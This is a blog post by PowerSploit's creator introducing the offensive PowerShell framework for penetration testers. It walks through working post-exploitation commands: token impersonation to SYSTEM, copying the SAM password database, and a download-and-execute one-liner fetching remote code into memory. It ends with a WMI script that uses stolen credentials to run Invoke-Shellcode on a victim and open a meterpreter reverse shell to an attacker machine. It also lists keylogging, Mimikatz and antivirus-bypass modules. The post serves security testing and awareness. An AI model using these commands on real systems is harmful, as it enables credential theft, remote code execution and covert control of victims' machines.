PowerSploit is an offensive security framework for penetration testers and reverse engineers. It was born out of the realization that PowerShell was the ideal post-exploitation utility in Windows due to its ability to perform a wide range of administrative and low-level tasks all without the need to drop malicious executables to disk, thus, evading antivirus products with ease. PowerSploit is a collection of modules broken down into the following high-level tasks:

  1. CodeExecution – Perform low-level code execution and code injection.
  2. ScriptModification – Modify and/or prepare scripts for execution on a compromised machine.
  3. Persistence – Add persistence capabilities to a PowerShell script.
  4. PETools – Parse/manipulate Windows portable executables.
  5. Capstone – A PowerShell binding for the Capstone Engine disassembly framework.
  6. ReverseEngineering – A wide range of reverse engineering tools
  7. AntivirusBypass – Defeat AV byte signatures in executables.
  8. Exfiltration – Steal sensitive data from a compromised machine.
  9. Mayhem – Perform destructive actions.
  10. Recon – Tools to aid in the reconnaissance phase of a penetration test

PowerSploit was created by Matt Graeber (@mattifestation) and its current maintainer and primary developer is Chris Campbell (@obscuresec). It has also greatly benefitted by the contributions of Joe Bialek (@JosephBialek) and Rich Lundeen (@RichLundeen).

PowerSploit’s claim to fame is that it was the first offensive security framework written for PowerShell. However, it’s certainly not the only game in town. Nishang, written by Nikhil Mittal (@nikhil_mitt) and the post-exploitation module in Posh-SecMod written by Carlos Perez (@Carlos_Perez), and Veil-PowerView by Will Schroeder (@harmj0y) are all outstanding alternatives and complements to PowerSploit worth checking out.

Prior to the inception of PowerSploit, PowerSyringe was developed – a PowerShell implementation of a shellcode injection utility called Syringe. For those unfamiliar with the concept, a shellcode injection utility is a tool that writes and executes a series of malicious assembly language instructions into a targeted process. There are many malicious tasks that shellcode payloads will perform but the most common payload will typically spawn a reverse shell – i.e. connect to an attacker controlled machine from which malicious commands are received and executed.

As the desire for more offensive tools increased, and more tools were developed, it was only natural to break out functionality into single ps1 files and package everything into a module while mostly adhering to PowerShell best practices. As more tools were developed and the scope of the project increased it also made more sense to rename the project to something that reflected its evolution into a full-fledged PowerShell-based offensive security framework that offered a subset of the functionality present in MetaSploit. PowerSploit was a natural choice.

Enough background. Let’s see PowerSploit in action…

Invoke-ShellcodeMSIL is a variant of Invoke-Shellcode. They are both shellcode execution scripts but Invoke-ShellcodeMSIL was chosen for this example because if the shellcode has a return value, it will be returned to your PowerShell session. This makes for a better demonstration. Invoke-Shellcode is more powerful but it will not return output to the PowerShell session.

Invoke-ShellcodeMSIL will be used to invoke the following X64 assembly language code:

MOV RAX, 0x10
MOV RCX, 0x10

This shellcode simply adds 16 and 16 and returns the sum. The byte representation of the shellcode is seen in the example that follows.

Invoke-ShellcodeMSIL -Shellcode @(0xB8,16,0,0,0,0xB9,0x10,0,0,0,0x48,1,0xC8,0xC3)

This was just a simple non-malicious proof of concept example but it should serve as a sufficient demonstration of PowerShell’s ability to perform low-level code execution. Now, using the Capstone module in PowerSploit we can disassemble the assembly language code from the previous example.

Get-CSDisassembly -Architecture X86 -Mode Mode64 -Code @(0xB8,16,0,0,0,0xB9,0x10,0,0,0,0x48,1,0xC8,0xC3) 

Address    Mnemonic Operands
-------    -------- --------
0x00000000 mov      eax, 0x10
0x00000005 mov      ecx, 0x10
0x0000000A add      rax, rcx
0x0000000D ret

Invoke-TokenManipulation can be used to enumerate available logon tokens on a system and impersonate any one of them. For example, Invoke-TokenManipulation can be used to spawn a process as NT AUTHORITY\SYSTEM

Invoke-TokenManipulation -Enumerate
Invoke-TokenManipulation -Username 'NT AUTHORITY\SYSTEM' -CreateProcess cmd.exe

A common post-exploitation task performed is to steal password hashes by obtaining the SAM database on a workstation or the ntds.dit database on a domain controller. These files are locked by the kernel and cannot be accessed using built-in Windows tools. Fortunately, there are two methods of obtaining these files with PowerSploit–Get/Mount-VolumeShadowCopy and Invoke-NinjaCopy.

The first example shows how a backed up version of the SAM database can be copied with ease by obtaining it within a mounted volume shadow copy.

Get-VolumeShadowCopy | Mount-VolumeShadowCopy -Path $PWD
cp $PWD\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM

The next example demonstrates Invoke-NinjaCopy being used to extract the live SAM database by getting a handle to the raw disk and carving out the target file from the relevant NTFS data structures.

Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination $PWD\SAM

There are many other useful tools present in PowerSploit which cannot all be covered in the interest of time. The following tools merit an honorable mention, however:

  • Invoke-Mimikatz – Load and execute a strictly memory-resident copy of Mimikatz – a full-featured credential dumping utility
  • Invoke-DllInjection – Inject a malicious DLL into a target process
  • Add-Persistence – Add persistence capabilities to any script or script block
  • Get-GPPPassword – Retrieve plain text group policy preference passwords
  • Get-VaultCredential – Retrieve Windows vault credentials
  • Get-TimedScreenshot – Take screenshots from a victim machine
  • Get-Keystrokes – Keylogger
  • Invoke-Portscan – Port scanner
  • Out-Minidump – Dump process memory to disk for offline analysis and/or credential harvesting
  • Get-PEHeader – Parse PE files on disk and in memory
  • Get-ILDisassembly – A .NET method disassembler
  • Get-Member (proxy function) – Display non-public .NET members by adding the -Private switch to Get-Member
  • Get-Strings – Print human-readable strings from memory
  • Out-EncryptedScript – Script encryption utility
  • Set-CriticalProcess – Cause Windows to blue screen upon exiting the process

Pentesters often ask how to perform the initial infection of a machine with PowerShell and how to go about obtaining and executing PowerSploit scripts on the victim machine. Remote PowerShell code execution can be achieved via the following, non-exhaustive list of techniques:

  1. PowerShell remoting – Requirements: Remoting must be enabled and the attacker has obtained user credentials
  2. WMI – Requirements: WMI service must be running, DCOM ports allowed through the firewall, and administrative credentials (in most cases)
  3. PsExec – Requirements: SMB allowed through the firewall and user credentials
  4. An exploit – Requirements: Remotely exploitable software and a sufficiently engineered exploit capable of bypassing all enabled exploit mitigations
  5. A command injection vulnerability – Requirements: A vulnerable service that fails to sanitize potentially malicious user input and consequently executes the malicious user input

Obtaining and executing malicious PowerSploit functions is made easy in PowerShell with the help of the .NET WebClient class and Invoke-Expression. Once code execution is gained on a victim machine, all the takes is a simple one-liner to download and execute a payload:

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/e0Mw9w')"

While this one-liner is ugly and certainly doesn’t conform to a single PowerShell best-practice, it is all an attacker needs to execute any arbitrary code on a compromised machine entirely in memory and all without having to worry about the execution policy.

To demonstrate an initial remote compromise in action, we will use WMI, specifically the static Create method of the Win32_Process object to download and execute Invoke-Shellcode on a victim machine for which we have stolen credentials. Once executed, it will connect to the attacker controlled machine and spawn a reverse shell using HTTP as its transport.

$VictimIP = ''
$AttackerIP = ''
$Hostname = 'WIN-92SPQPW9R24'
$Username = 'DevelopersDevelopersDevelopers'
$Credential = Get-Credential -Credential "$Hostname\$Username"
# Attacker then enters the password of the user
$Command = {Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost $AttackerIP -Lport 80}
$InvokeShellcodeUrl = 'https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'
$PayloadString = "iex(New-Object Net.WebClient).DownloadString('$InvokeShellcodeUrl');$Command"

$Parameters = @{
    ComputerName = $VictimIP
    Credential = $Credential
    Class = 'Win32_Process'
    Name = 'Create'
    ArgumentList = "powershell -nop -c $PayloadString"

Invoke-WmiMethod @Parameters

As a final note, some astute readers may have noticed that the overwhelming majority of scripts present in PowerSploit are written in PowerShell 2.0 syntax. This is necessary because it is naïve for a pentester to think that an organization will ever have the latest version of PowerShell deployed. At the same time, it is exceedingly unlikely that PowerShell 1.0 will be installed on a machine thus, 2.0 syntax was chosen as the lowest common denominator. Additionally, most scripts in PowerSploit are packaged as individual scripts and they rarely contain any external dependencies. This makes it so that a pentester doesn’t have to download PowerSploit in its entirety to a victim machine. He/she only has to download just enough code to achieve their goal.

Hopefully by now, you have a better understanding of the capabilities of and motivations behind PowerSploit. Happy hacking!

About the author: Matt Graeber

Matt is a malware reverse engineer, security professional, and PowerShell MVP who is always finding new ways to incorporate PowerShell into his workflow. As one of just a handful of security-minded PowerShell hackers, he also promotes PowerShell as an attack platform in an effort to raise awareness of its security implications in the enterprise. Matt frequently writes about esoteric uses of PowerShell, reverse engineering, and security research on his blog - www.exploit-monday.com.

Related Posts